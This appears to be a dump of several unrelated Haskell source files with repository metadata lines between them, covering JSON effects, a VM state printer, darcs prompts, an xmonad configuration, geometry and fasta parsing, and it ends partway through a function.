\ (WriteProp p v next) -> go ((p, toJSON v):j) (next v)
runJSONIO :: Object -> Eff (JSONOut :> JSONIn :> r) a -> Eff r (Either JSONError (Value, a))
runJSONIO obj = runJSONIn obj . runJSONOut
runJSONIO' :: ByteString -> Eff (JSONOut :> JSONIn :> r) a -> Eff r (Either JSONError (Value, a))
runJSONIO' bs = runJSONIn' bs . runJSONOut
| lechimp-p/json-effects | Control/Eff/JSON.hs | mit | 6,548 | 0 | 16 | 1,849 | 2,428 | 1,229 | 1,199 | 153 | 3 |
module PPL2.Pretty.MState where
import PPL2.Prelude
import PPL2.VM.Types
import PPL2.VM.Memory.State
import PPL2.Pretty.Instr
import PPL2.VM.Memory.RTS (RTS)
import PPL2.VM.Memory.Segment (Segment)
import PPL2.VM.Memory.Stack (Stack)
import PPL2.VM.Memory.CodeSeg (CodeSegment)
import qualified PPL2.VM.Memory.RTS as RTS
import qualified PPL2.VM.Memory.Segment as Segment
import qualified PPL2.VM.Memory.Stack as Stack
import qualified PPL2.VM.Memory.CodeSeg as CodeSeg
import PPL2.CodeGen.Builder (Builder(..),builder2List)
type Lines = Builder String
-- | Wrap a single output line in the difference-list builder.
ln :: String -> Lines
ln l = BU (l:)

-- | A blank output line.
-- Fix: the original 'nl' had no top-level type signature (flagged by
-- -Wmissing-signatures); behavior is unchanged.
nl :: Lines
nl = ln ""
prettyMState :: (Show v) => MState v -> String
prettyMState = unlines . builder2List . prettyMState'
prettyMState' :: (Show v) => MState v -> Lines
prettyMState' s = mconcat $
[ nl
, ln "machine state"
, ln "============="
, nl
, ln "status register"
, ln "==============="
, nl
, prettyMStatus $ s ^. msStatus
, nl
, ln "program counter"
, ln "==============="
, nl
, prettyPC $ s ^. msPC
, nl
, ln "evaluation stack"
, ln "================"
, nl
, prettyStack $ s ^. msStack
, nl
, ln "global memory"
, ln "============="
, nl
, prettySegment $ s ^. msMem
, nl
, ln "runtime stack"
, ln "============="
, nl
, prettyRTS $ s ^. msFrames
, nl
]
prettyMStatus :: Show v => MStatus v -> Lines
prettyMStatus s = ln $ fmt' ["status", show s]
prettyPC :: CodeRef -> Lines
prettyPC pc' = ln $ fmt' ["pc", show pc']
-- | Render the evaluation stack one numbered cell per line, or the
-- placeholder @<empty>@ when there are no cells.
prettyStack :: Show v => Stack v -> Lines
prettyStack stack =
  case Stack.unStack stack of
    []    -> ln "<empty>"
    cells -> mconcat (zipWith render [0 :: Int ..] cells)
  where
    render ix val = ln (fmt' [show ix, show val])
-- | Render a memory segment dump one numbered cell per line.
prettySegment :: Show v => Segment v -> Lines
prettySegment seg =
  mconcat (zipWith render [0 ..] (Segment.dump seg))
  where
    render ix val = ln (fmt' [show ix, show val])
prettyRTS :: Show v => RTS v -> Lines
prettyRTS rts = ln "RTS dump not yet implemented"
| UweSchmidt/ppl2 | src/PPL2/Pretty/MState.hs | mit | 1,974 | 0 | 10 | 443 | 694 | 383 | 311 | 70 | 1 |
module Rhodium.Types (
Program(..)
, Clause(..)
, Morphism(..)
, Pat(..)
, Name
, Binds
, Stack
, Value(..)
, showRh
)
where
import Data.ByteString ( ByteString )
import Data.ByteString.UTF8 ( toString )
import Data.ByteString.Short ( ShortByteString, fromShort )
import Text.PrettyPrint
data Program = Program [(Name,Value)] deriving (Show)
data Clause = Clause [Pat] [Morphism] [Pat] deriving (Show)
data Morphism =
Morphism [Pat] Name [Pat]
deriving (Show)
data Pat =
Pat Name [Pat]
| PVar Name
deriving (Show)
type Name = ByteString
-- ShortByteString
type Binds = [(Name,Value)]
type Stack = [Value]
data Value =
Value Name [Value]
| VFun [Clause]
deriving (Show)
-- pretty printing of Rhodium code
class ToDoc a where
toDoc :: a -> Doc
instance ToDoc ShortByteString where
toDoc = text . toString . fromShort
instance ToDoc ByteString where
toDoc = text . toString
instance ToDoc Pat where
toDoc (Pat name pats) =
toDoc name <> if null pats then empty
else parens (hsep $ map toDoc pats)
toDoc (PVar name) =
toDoc name
instance ToDoc Morphism where
toDoc (Morphism ins f outs) =
hsep (map toDoc ins) <+> text ">-" <+> toDoc f <+> text "->" <+> hsep (map toDoc outs)
instance ToDoc Clause where
toDoc (Clause pats [] ctrs) =
hsep (map toDoc pats) <+> text ">->" <+> hsep (map toDoc ctrs)
toDoc (Clause pats mors ctrs) =
(toDoc (Clause pats [] ctrs) <+> text ":=")
$+$ nest 4 (vcat $ map toDoc mors)
instance ToDoc Program where
toDoc (Program defs) =
vcat $ map f defs
where
f (name, VFun clauses) =
toDoc name <+> lbrace
$+$ nest 4 (vcat $ map toDoc clauses)
$+$ rbrace
f (name, v@(Value _ _)) =
toDoc name <> text " := " <> toDoc v
instance ToDoc Value where
toDoc (Value name pats) =
toDoc name <> if null pats then empty
else parens (hsep $ map toDoc pats)
toDoc (VFun clauses) =
lbrace
$+$ nest 4 (vcat $ map toDoc clauses)
$+$ rbrace
showRh :: ToDoc a => a -> IO ()
showRh = putStrLn . render . toDoc
| DrNico/rhodium | tools/rhc-strap/Rhodium/Types.hs | mit | 2,276 | 0 | 13 | 706 | 844 | 448 | 396 | 70 | 1 |
module Samples where
import Test.Hspec
import Data.Map (Map, fromList)
import qualified Data.Map as Map
import Places
import Game
import Graph
import DIYGraph
import Dictionary
import Parse
import Player
import Text.ParserCombinators.Parsec.Error(ParseError(..), Message, newErrorMessage, errorMessages, messageEq)
import Text.Parsec.Pos(SourcePos, initialPos)
-- ParseError isn't an instance of Eq
instance Eq ParseError where
a == b = errorMessages a == errorMessages b
sampleFile :: String
sampleFile =
"1. A place\n\
\ description\n\
\-> South (s): 2\n\
\2. A place\n\
\ description\n\
\-> North (n): 1"
sampleDefinitions :: Dictionary
sampleDefinitions = Map.fromList [ ("s", "South"), ("n", "North"), ("south", "South"), ("north", "North") ]
sampleExits :: [Exit]
sampleExits = [ Exit "South" ["s"] 2 ]
samplePlaces :: [ Place ]
samplePlaces = [ Place 1 "A place" "description" [] [] [Exit "South" ["s"] 2] ,
Place 2 "A place" "description" [] [] [Exit "North" ["n"] 1] ]
sampleGraph = ( [("North", 2)], (1, head samplePlaces), [("South", 2)]) :&:
(([("South", 1)], (2, last samplePlaces), [("North", 1)]) :&: EmptyGraph)
sampleMap :: String
sampleMap = "1. A place\n description\n-> South (s): 2\n" ++
"2. A place\n description\n-> North (n): 1"
sampleMap2 :: String
sampleMap2 = "1. A place\n description\n-> South (s): 2\n" ++
"2. A pit\n description\n" ++
"3. A place\n description\n-> North (n): 1, West (w): 2"
samplePlaces2 :: [ Place ]
samplePlaces2 = [ Place 1 "A place" "description" [] [] [Exit "South" ["s"] 2],
Place 2 "A pit" "description" [] [] [],
Place 3 "A place" "description" [] [] [Exit "North" ["n"] 1, Exit "West" ["w"] 2]]
sampleMapExitsGood = "-> South (s): 2"
sampleMap2Defs :: Dictionary
sampleMap2Defs = Map.fromList [ ("s", "South"), ("south", "South"),
("n", "North"), ("north", "North"),
("w", "West"), ("west", "West") ]
sampleMap2Exits = [ Exit "South" ["s"] 2, Exit "North" ["n"] 1,
Exit "West" ["w"] 2]
sampleMapExitsBad :: String
sampleMapExitsBad = "-> South @#4 f(s): 2"
samplePlayer :: Player
samplePlayer = makePlayer sampleGraph
sampleGame :: Game
sampleGame = Game { player = samplePlayer,
mapGraph = sampleGraph,
dictionary = sampleDefinitions }
sampleGameSouth :: Game
sampleGameSouth = Game { player = Player {currentPlace = 2, playerInventory = [], playerInfo = fromList [("Alive","True"),("Won","False"),("description","As lovely as ever."),("score","0")]},
mapGraph = sampleGraph,
dictionary = sampleDefinitions }
| emhoracek/explora | test-suite/Samples.hs | gpl-2.0 | 2,807 | 0 | 11 | 693 | 785 | 465 | 320 | 57 | 1 |
module Darcs.Util.Prompt
(
-- * User prompts
askEnter
, askUser
, askUserListItem
, PromptConfig(..)
, promptYorn
, promptChar
) where
import Prelude hiding ( catch )
import Control.Monad ( void )
import Data.Char ( toUpper, toLower, isSpace )
import System.Console.Haskeline ( runInputT, defaultSettings, getInputLine,
getInputChar, outputStr, outputStrLn )
import Darcs.Util.Progress ( withoutProgress )
-- | Ask the user for a line of input.
--
-- Progress output is suspended while the prompt is active so it cannot
-- interleave with the user's typing.  Calls 'error' if the input stream
-- ends (EOF) before a line is read.
askUser :: String    -- ^ The prompt to display
        -> IO String -- ^ The string the user entered.
askUser prompt = withoutProgress $ runInputT defaultSettings $
    getInputLine prompt
    >>= maybe (error "askUser: unexpected end of input") return
-- | Display a prompt and wait for the user to press Enter, discarding
-- whatever was typed on the line.
askEnter :: String -- ^ The prompt to display
         -> IO ()
askEnter = void . askUser
-- | @askUserListItem prompt xs@ enumerates @xs@ on the screen, allowing
-- the user to choose one of the items
--
-- Items are printed as a 1-based numbered list; the loop re-prompts until
-- the user enters a number in range, then returns the selected item
-- itself (not its index).  Calls 'error' on EOF.
askUserListItem :: String
                -> [String]
                -> IO String
askUserListItem prompt xs = withoutProgress $ runInputT defaultSettings $ do
    -- Print "1. item", "2. item", ... before the first prompt.
    outputStr . unlines $ zipWith (\n x -> show n ++ ". " ++ x) [1::Int ..] xs
    loop
  where
    loop = do
        answer <- getInputLine prompt
                  >>= maybe (error "askUser: unexpected end of input") return
        -- The range guard makes the (!!) below safe.
        case maybeRead answer of
            Just n | n > 0 && n <= length xs -> return (xs !! (n-1))
            _ -> outputStrLn "Invalid response, try again!" >> loop
-- | Parse a value with 'reads', succeeding only when there is exactly
-- one parse and nothing but whitespace remains after it.
maybeRead :: Read a
          => String
          -> Maybe a
maybeRead input
    | [(value, leftover)] <- reads input
    , all isSpace leftover = Just value
    | otherwise            = Nothing
-- | Configuration for a single-character prompt (see 'promptChar').
data PromptConfig = PromptConfig { pPrompt :: String -- ^ text shown before the choice list
                                 , pBasicCharacters :: [Char] -- ^ choices listed in the prompt
                                 , pAdvancedCharacters :: [Char] -- ^ only shown on help
                                 , pDefault :: Maybe Char -- ^ selected by space bar; displayed uppercased
                                 , pHelp :: [Char] -- ^ characters that request help (returned to the caller)
                                 }
-- | Ask the user a yes\/no question; 'True' iff the answer was \'y\'.
promptYorn :: String -> IO Bool
promptYorn question = do
    answer <- promptChar (PromptConfig question "yn" [] Nothing [])
    return (answer == 'y')
-- | Prompt the user for a character, among a list of possible ones.
-- Always returns a lowercase character. This is because the default
-- character (ie, the character shown in uppercase, that is automatically
-- selected when the user presses the space bar) is shown as uppercase,
-- hence users may want to enter it as uppercase.
promptChar :: PromptConfig -> IO Char
promptChar (PromptConfig p basic_chs adv_chs md help_chs) =
  withoutProgress $ runInputT defaultSettings loopChar
 where
  -- Every answer the prompt accepts; advanced ones are hidden behind "...".
  chs = basic_chs ++ adv_chs
  loopChar = do
    let chars = setDefault (basic_chs ++ (if null adv_chs then "" else "..."))
        prompt = p ++ " [" ++ chars ++ "]" ++ helpStr
    -- Input is lowercased so the uppercase-displayed default still matches.
    a <- getInputChar prompt >>= maybe (error "promptChar: unexpected end of input") (return . toLower)
    -- Accepted char | space selects the default (if any) | help char | retry.
    case () of
      _ | a `elem` chs -> return a
        | a == ' ' -> maybe tryAgain return md
        | a `elem` help_chs -> return a
        | otherwise -> tryAgain
  -- Suffix advertising the help character, when one is configured.
  helpStr = case help_chs of
              [] -> ""
              (h:_) | null adv_chs -> ", or " ++ (h:" for help: ")
                    | otherwise -> ", or " ++ (h:" for more options: ")
  tryAgain = do outputStrLn "Invalid response, try again!"
                loopChar
  -- Render the default choice (if any) in uppercase inside the choice list.
  setDefault s = case md of Nothing -> s
                            Just d -> map (setUpper d) s
  setUpper d c = if d == c then toUpper c else c
module Value (Environment, Couple, Term, Cons, Symbol, Constraint, Value(Cons, Symbol, Data, Control), Control(Closure, Primitive, Function, Action), Promise(Thunk, Result)) where
import Data
import Promise
import Expression
import Store
import Binding
import JSON
import Data.List
import Text.JSON
type Environment = Address (Binding Value)
type Couple = (Value, Value)
type Cons = Address Couple
-----------
-- Value --
-----------
-- | A runtime value, tagged by the kind of payload it carries.
data Value
  = Cons Cons -- ^ address of a couple (pair) in the store
  | Symbol Symbol
  | Data Data
  | Control Control -- ^ callable value, see 'Control'
  deriving Eq
-- Values serialise to a single-key JSON object whose key names the
-- constructor ("cons", "symbol", "data" or "control").
--
-- Fix: 'readJSON' previously had no fallback clause, so a malformed
-- object (wrong key, extra keys) or a non-object JSON value crashed
-- with a pattern-match failure instead of returning a JSON 'Error'
-- (the 'Control' instance below already handles this case).
instance JSON Value where
  showJSON (Cons addr) = JSObject $ toJSObject [("cons", showJSON addr)]
  showJSON (Symbol addr) = JSObject $ toJSObject [("symbol", showJSON addr)]
  showJSON (Data dta) = JSObject $ toJSObject [("data", showJSON dta)]
  showJSON (Control ctr) = JSObject $ toJSObject [("control", showJSON ctr)]
  readJSON (JSObject obj) = case fromJSObject obj
    of (("cons", jsv):[]) -> (readJSON jsv) >>= (return . Cons)
       (("symbol", jsv):[]) -> (readJSON jsv) >>= (return . Symbol)
       (("data", jsv):[]) -> (readJSON jsv) >>= (return . Data)
       (("control", jsv):[]) -> (readJSON jsv) >>= (return . Control)
       _ -> Error "expected an object with exactly one of the keys cons/symbol/data/control"
  readJSON jsv = Error $ (show jsv)++" is not a valid value"
-------------
-- Control --
-------------
-- | Callable values.  The three name-carrying constructors are
-- distinguished on deserialisation by the name's first character:
-- \'?\' means 'Function', \'!\' means 'Action', anything else is a
-- 'Primitive' (see the 'JSON' instance below).
data Control
  = Closure [String] Expression Environment -- ^ parameters, body, captured environment
  | Primitive String
  | Function String
  | Action String
  deriving Eq
-- Primitive/Function/Action all serialise to a bare JSON string; the
-- round trip relies on the '?'/'!' prefixes of the name to recover the
-- constructor.  Closures serialise to a three-field object.
instance JSON Control where
  showJSON (Closure strs expr env) = JSObject $ toJSObject [("parameters", showJSON strs), ("body", showJSON expr), ("environment", showJSON env)]
  showJSON (Primitive str) = showJSON $ str
  showJSON (Function str) = showJSON $ str
  showJSON (Action str) = showJSON $ str
  -- Bare strings: dispatch on the first character of the name.
  readJSON (JSString jss) = case fromJSString jss
    of name@('?':_) -> Ok $ Function name
       name@('!':_) -> Ok $ Action name
       name -> Ok $ Primitive name
  -- Objects: a closure; 'property' fails with Error on missing fields.
  readJSON (JSObject obj) = let pairs = fromJSObject obj
                            in do params <- property "parameters" pairs
                                  body <- property "body" pairs
                                  env <- property "environment" pairs
                                  return $ Closure params body env
  readJSON jsv = Error $ (show jsv)++" is not a valid control"
| lachrist/kusasa-hs | value.hs | gpl-2.0 | 2,385 | 0 | 11 | 698 | 806 | 441 | 365 | 55 | 0 |
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
import ClassyPrelude
import Test.Hspec
import Scrape
import Types
-- | Test entry point: integration specs for the Scrape module.
-- NOTE(review): 'getArticles'/'getArticleContents' are opaque here;
-- the URL assertion suggests these tests hit the live bunte.de site
-- and therefore need network access — TODO confirm.
main :: IO ()
main = hspec $
  describe "Scrape" $ do
    describe "getArticles" $ do
      it "produces a non-empty list of articles" $
        getArticles `shouldNotReturn` []
      it "creates article URLs below bunte.de" $
        let shouldBeAtBunte (Article _ url _) = unpack url `shouldStartWith` "http://www.bunte.de/" in
        getArticles >>= mapM_ shouldBeAtBunte
    describe "getArticleContents" $
      it "returns a non empty text" $ do
        articles <- getArticles
        case articles of
          [] -> expectationFailure "No articles available"
          (a:_) -> getArticleContents a `shouldNotReturn` ""
| sebastianpoeplau/servant-experiment | test/Spec.hs | gpl-2.0 | 900 | 0 | 18 | 317 | 185 | 90 | 95 | 21 | 2 |
module Main where
import System.Environment (getArgs)
import Data.MyReverse
-- | Entry point: read the command-line arguments, reverse them with
-- 'myReverse', and print the resulting list to stdout.
--
-- Fix: added the missing top-level type signature (flagged by
-- -Wmissing-signatures / -Wall).
main :: IO ()
main = do
  args <- getArgs
  print $ myReverse args
| AntoineSavage/haskell | cabal_htf_tutorial/src/Main.hs | gpl-2.0 | 129 | 0 | 8 | 22 | 41 | 22 | 19 | 6 | 1 |
-- Author: Viacheslav Lotsmanov
-- License: GPLv3 https://raw.githubusercontent.com/unclechu/xmonadrc/master/LICENSE
{-# OPTIONS_GHC -fno-warn-missing-signatures #-}
{-# LANGUAGE PackageImports #-}
module Config
( myConfig
) where
import "xmonad" XMonad ( (=?), (-->), (<&&>), (<+>), (|||)
, Mirror (Mirror)
, Full (Full)
, ManageHook
, composeAll
, className, title, stringProperty
)
import qualified "xmonad" XMonad as XM
import qualified "xmonad" XMonad.StackSet as W
import "xmonad-contrib" XMonad.Layout.Grid (Grid (Grid))
import "xmonad-contrib" XMonad.Layout.Spiral (spiral)
import "xmonad-contrib" XMonad.Layout.NoBorders (noBorders)
import "xmonad-contrib" XMonad.Layout.SimplestFloat (simplestFloat)
import "xmonad-contrib" XMonad.Layout.PerWorkspace (onWorkspace)
import "xmonad-contrib" XMonad.Layout.Cross (simpleCross)
import "xmonad-contrib" XMonad.Layout.Circle (Circle (Circle))
import "xmonad-contrib" XMonad.Layout.CenteredMaster (centerMaster)
import "xmonad-contrib" XMonad.Layout.ThreeColumns (ThreeCol (ThreeColMid))
import "xmonad-contrib" XMonad.Layout.ResizableTile (ResizableTall (ResizableTall))
import qualified "xmonad-contrib" XMonad.Layout.Tabbed as Tabbed
import "xmonad-contrib" XMonad.Hooks.ManageDocks (manageDocks, avoidStruts, docksEventHook)
import "xmonad-contrib" XMonad.Hooks.ManageHelpers (doCenterFloat)
import "xmonad-contrib" XMonad.Hooks.EwmhDesktops (activateLogHook)
import "xmonad-contrib" XMonad.Hooks.FadeInactive
( fadeInactiveLogHook
, fadeInactiveCurrentWSLogHook
)
import "data-default" Data.Default (def)
-- local imports
import Workspaces (myWorkspaces)
import FocusHook (focusManageHook)
import Utils.CustomConfig (Config ( cfgMetaKey
, cfgTerminal
, cfgBorderWidth
, cfgInactiveWindowOpacity
, cfgInactiveWindowOpacityOnlyForCurrentWs
)
)
myConfig customConfig = def
{ XM.manageHook = manageDocks
<+> focusManageHook
<+> myManageHook
<+> XM.manageHook def
, XM.logHook = activateLogHook focusManageHook
<+> opacityLogHook
<+> XM.logHook def
, XM.layoutHook = myLayoutHook
, XM.handleEventHook = docksEventHook <+> XM.handleEventHook def
, XM.borderWidth = read $ show $ cfgBorderWidth customConfig
, XM.modMask = cfgMetaKey customConfig
, XM.terminal = cfgTerminal customConfig
, XM.workspaces = myWorkspaces
, XM.focusFollowsMouse = False
, XM.clickJustFocuses = True
}
where
myLayoutHook =
onWorkspace (last myWorkspaces) lastLayouts $
onWorkspace (last $ init myWorkspaces) secondaryLayouts $
onWorkspace (myWorkspaces !! 2) secondaryLayouts $
usualLayouts
where
ration = 2/3 -- master proportion
delta = 1/100 -- percent of master resize
tabbedLayout = Tabbed.tabbed Tabbed.shrinkText myTabTheme
mySpiral = spiral (6/7)
rTiled = ResizableTall 1 delta ration []
usualLayouts =
( avoidStruts $ rTiled
||| Mirror rTiled
||| Grid
||| mySpiral
||| simpleCross
||| Circle
||| centerMaster Grid
||| tabbedLayout
||| ThreeColMid 1 delta (1/2)
) ||| simplestFloat
||| noBorders Full
secondaryLayouts =
( avoidStruts $ centerMaster Grid
||| Grid
||| rTiled
||| Mirror rTiled
||| mySpiral
||| simpleCross
||| Circle
||| tabbedLayout
) ||| simplestFloat
||| noBorders Full
lastLayouts =
( avoidStruts $ Grid
||| rTiled
||| Mirror rTiled
||| mySpiral
||| simpleCross
||| Circle
||| centerMaster Grid
||| tabbedLayout
) ||| simplestFloat
||| noBorders Full
opacityLogHook =
let inactiveOpacity = cfgInactiveWindowOpacity customConfig
in if cfgInactiveWindowOpacityOnlyForCurrentWs customConfig
then fadeInactiveCurrentWSLogHook inactiveOpacity
else fadeInactiveLogHook inactiveOpacity
myManageHook :: ManageHook
myManageHook = composeAll $
[ className =? "Gmrun" --> doCenterFloat
, title =? "gpaste-zenity" --> doCenterFloat
, className =? "Gpaste-gui.pl" --> doCenterFloat
, className =? "Gnome-calculator" --> doCenterFloat
-- GIMP
, wmRole =? "gimp-toolbox-color-dialog" --> doCenterFloat
, wmRole =? "gimp-message-dialog" --> doCenterFloat
, wmRole =? "gimp-layer-new" --> doCenterFloat
, wmRole =? "gimp-image-new" --> doCenterFloat
, className =? "qjackctl" --> doCenterFloat
, className =? "Audacious" --> moveTo (last $
init myWorkspaces)
, className =? "Doublecmd"
<&&> fmap not (nameContains "Double Commander ")
--> doCenterFloat
-- Force child windows of Ardour to be float
, ardourChildWindow --> doCenterFloat
-- Move messangers to last workspace
, className =? "Gajim" --> moveTo lastWs
, className =? "Hexchat" --> moveTo lastWs
, className =? "utox" --> moveTo lastWs
, className =? "qTox" --> moveTo lastWs
, className =? "Gnome-ring" --> moveTo lastWs
, className =? "Riot" --> moveTo lastWs
, className =? "Rambox" --> moveTo lastWs
, className =? "Thunderbird" --> moveTo lastWs
]
++
-- Audacious
[ className =? "Audacious" <&&> title =? x --> doCenterFloat
| x <- [ "Song Info"
, "Audacious Settings"
, "JACK Output Settings"
, "Add Files"
, "Open Files"
]
]
where wmRole = stringProperty "WM_WINDOW_ROLE"
wmName = stringProperty "WM_NAME"
moveTo = XM.doF . W.shift
lastWs = last myWorkspaces
ardourChildWindow = fmap m className
where m :: String -> Bool
m ('A':'r':'d':'o':'u':'r':'-':'5':'.':_) = True
m _ = False
nameContains :: String -> XM.Query Bool
nameContains namePart = fmap f wmName
where f :: String -> Bool
f x | x == "" = False
| part x == namePart = True
| otherwise = f $ tail x
len = length namePart :: Int
part = take len :: String -> String
-- | Colour scheme and font for the tabbed layout decoration: dark-teal
-- active tab on grey inactive tabs, 12px tab bar, terminus font.
myTabTheme :: Tabbed.Theme
myTabTheme = def
  { Tabbed.activeColor = "#3c5863"
  , Tabbed.activeBorderColor = "#000000"
  , Tabbed.inactiveColor = "#666666"
  , Tabbed.inactiveBorderColor = "#000000"
  , Tabbed.activeTextColor = "lightgray"
  , Tabbed.inactiveTextColor = "#aaa"
  , Tabbed.decoHeight = 12
  , Tabbed.fontName = "terminus"
  }
| unclechu/xmonadrc | xmonad/src/Config.hs | gpl-3.0 | 7,977 | 0 | 20 | 3,029 | 1,479 | 834 | 645 | 160 | 2 |
{-# LANGUAGE DeriveFunctor #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE MultiParamTypeClasses #-}
module Geometry.Hyperplane
( Hyperplane(..)
, planeNormal, planeValue
, planeDist
, movePlane
) where
import Linear
import Linear.Affine
import Control.Lens hiding (transform)
import Constraints.Vector
import Transformation
-- A hyperplane (or half space) of a vector space: the points p with
-- _planeNormal `dot` p == _planeValue (compare 'planeDist' below).
data Hyperplane v a = Hyperplane
  { _planeNormal :: v a -- ^ normal vector of the plane
  , _planeValue :: a -- ^ value of normal `dot` p for points p on the plane
  }
  deriving (Show, Functor)
makeLenses ''Hyperplane
-- Signed distance measure of a point relative to the plane.
-- Positive values mean 'in front of the plane'
-- (or 'outside the half space'),
-- negative values mean 'behind the plane'
-- (or 'in the half space').
planeDist :: (Metric v, Num a) => Hyperplane v a -> Point v a -> a
planeDist (Hyperplane normal value) (P point) = dot normal point - value
-- Transforming a hyperplane: apply the transformation to the normal,
-- then shift the plane value by the translation's component along the
-- new normal, so points on the plane map to points on the new plane.
instance (SomeVector v) => Transformable v (Hyperplane v) where
  transform t (Hyperplane n v) =
    let n' = transform t n
        v' = v + (translationPart t `dot` n')
    in Hyperplane n' v'
-- | Offset a hyperplane by adding the given amount to its plane value,
-- leaving the normal unchanged.
movePlane :: (Num a) => a -> Hyperplane v a -> Hyperplane v a
movePlane offset (Hyperplane normal value) = Hyperplane normal (value + offset)
| MatthiasHu/4d-labyrinth | src/Geometry/Hyperplane.hs | gpl-3.0 | 1,124 | 0 | 13 | 226 | 313 | 174 | 139 | 28 | 1 |
import System.Serverman.Utils
import Test.QuickCheck
| mdibaiee/serverman | test/Utils.hs | gpl-3.0 | 55 | 0 | 4 | 6 | 12 | 7 | 5 | 2 | 0 |
-- Parse module.
-- By G.W. Schwartz
--
{- | Collection of functions for the parsing of a fasta file. Uses the Text
type.
-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE BangPatterns #-}
module Data.Fasta.Text.Parse ( parsecFasta
, parsecCLIPFasta
, attoFasta
, attoCLIPFasta
, pipesFasta
, pipesCLIPFasta
, removeNs
, removeN
, removeCLIPNs ) where
-- Built-in
import Data.Char
import Text.Parsec
import Text.Parsec.Text
import qualified Data.Map.Strict as Map
import qualified Data.Text as T
import qualified Control.Applicative as CA
import Control.Monad (void)
-- Cabal
import qualified Data.Attoparsec.Text as A
import Pipes
import qualified Pipes.Prelude as P
import qualified Pipes.Text as PT
import qualified Pipes.Group as PG
import qualified Pipes.Attoparsec as PA
import Control.Lens (view)
import qualified Control.Foldl as FL
-- Local
import Data.Fasta.Text.Types
eol :: Parsec T.Text u String
eol = choice . map (try . string) $ ["\n\r", "\r\n", "\n", "\r"]
eoe :: Parsec T.Text u ()
eoe = lookAhead (void $ char '>') <|> eof
-- | Parse one fasta record: a \'>\' header line followed by sequence
-- text up to the next record header (or end of input).  All whitespace
-- inside the sequence body is stripped.
fasta :: Parsec T.Text u FastaSequence
fasta = do
    spaces
    char '>'
    header <- manyTill (satisfy (/= '>')) eol
    fseq <- manyTill anyChar eoe
    return (FastaSequence { fastaHeader = T.pack header
                          , fastaSeq = T.pack . removeWhitespace $ fseq } )
  where
    removeWhitespace = filter (`notElem` ("\n\r " :: String))
fastaFile :: Parsec T.Text u [FastaSequence]
fastaFile = do
spaces
many fasta
fastaCLIP :: Parsec T.Text u (FastaSequence, [FastaSequence])
fastaCLIP = do
spaces
char '>'
germline <- fasta
clones <- many $ try fasta
return (germline, clones)
fastaCLIPFile :: Parsec T.Text u [(FastaSequence, [FastaSequence])]
fastaCLIPFile = do
spaces
many fastaCLIP
-- | Parse a standard fasta file
--
-- NOTE: calls 'error' (rather than returning an 'Either') when the
-- input does not parse.
parsecFasta :: T.Text -> [FastaSequence]
parsecFasta = eToV . parse fastaFile "error"
  where
    eToV (Right x) = x
    eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | Parse a CLIP fasta file
parsecCLIPFasta :: T.Text -> CloneMap
parsecCLIPFasta = Map.fromList
. map (\(!x, (!y, !z)) -> ((x, y), z))
. zip [0..]
. eToV
. parse fastaCLIPFile "error"
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | attoparsec: parse a single character while skipping any surrounding
-- whitespace.  Used for sequence bodies, so embedded newlines and
-- spaces are silently dropped from the parsed sequence.
anyButSpace :: A.Parser Char
anyButSpace = do
    A.skipSpace
    x <- A.anyChar
    A.skipSpace
    return x
-- | attoparsec parser for a fasta type
fasta' :: A.Parser FastaSequence
fasta' = do
header <- A.takeWhile (not . A.isEndOfLine)
A.endOfLine
fseq <- A.manyTill anyButSpace (void (A.char '>') CA.<|> A.endOfInput)
return FastaSequence { fastaHeader = header
, fastaSeq = T.pack fseq }
-- | attoparsec parser for a fasta file
fastaFile' :: A.Parser [FastaSequence]
fastaFile' = do
A.skipSpace
A.char '>'
A.many' fasta'
-- | attoparsec parser for a CLIP fasta sequence.  A CLIP germline
-- entry has exactly the same shape as a plain fasta entry, so this is
-- an alias for 'fasta'' rather than a byte-for-byte duplicate of its
-- definition (which is what was here before).
fastaCLIP' :: A.Parser FastaSequence
fastaCLIP' = fasta'
clone' :: A.Parser (Germline, [FastaSequence])
clone' = do
A.skipSpace
germline <- fastaCLIP'
fseqs <- A.manyTill fasta' (void (A.char '>') CA.<|> A.endOfInput)
return (germline, fseqs)
-- | attoparsec parser for a fasta file
fastaCLIPFile' :: A.Parser [(Germline, [FastaSequence])]
fastaCLIPFile' = do
A.skipSpace
A.string ">>"
A.many' clone'
-- | Parse a standard fasta file
attoFasta :: T.Text -> [FastaSequence]
attoFasta = eToV . A.parseOnly fastaFile'
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | Parse a CLIP fasta file
attoCLIPFasta :: T.Text -> [(Germline, [FastaSequence])]
attoCLIPFasta = eToV . A.parseOnly fastaCLIPFile'
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | Parse a standard fasta file into a pipe
--
-- Streaming variant: drops everything before the first \'>\', splits
-- the stream on \'>\' markers, folds each chunk back into a single
-- 'T.Text' and converts it to a 'FastaSequence' (first line = header,
-- remaining lines concatenated = sequence; CRs are stripped).
-- NOTE(review): 'head'\/'tail' in @toFasta@ are partial — an empty
-- chunk (e.g. a trailing bare \'>\') would crash; confirm the splitter
-- never yields one.
pipesFasta :: (MonadIO m) => Producer T.Text m () -> Producer FastaSequence m ()
pipesFasta p = FL.purely PG.folds FL.mconcat ( view (PT.splits '>')
                                             . PT.drop (1 :: Int)
                                             $ p )
           >-> P.map toFasta
  where
    toFasta x = FastaSequence { fastaHeader = head . lines' $ x
                              , fastaSeq = T.concat . tail . lines' $ x }
    lines' = T.lines . T.filter (/= '\r')
-- | Parse a CLIP fasta file into a pipe
pipesCLIPFasta :: (MonadIO m)
=> Producer T.Text m ()
-> Producer (Germline, [FastaSequence]) m (Either (PA.ParsingError, Producer T.Text m ()) ())
pipesCLIPFasta = PA.parsed clone' . PT.drop 2 . (>-> PT.stripStart)
-- | Remove Ns from a collection of sequences: every \'N\' or \'n\' in
-- each sequence body becomes a gap character (\'-\').  Delegates to
-- 'removeN' so the substitution logic lives in one place instead of
-- being duplicated here.
removeNs :: [FastaSequence] -> [FastaSequence]
removeNs = map removeN
-- | Remove Ns from a sequence: every \'N\' or \'n\' in the sequence
-- body becomes a gap character (\'-\'); the header is left untouched.
removeN :: FastaSequence -> FastaSequence
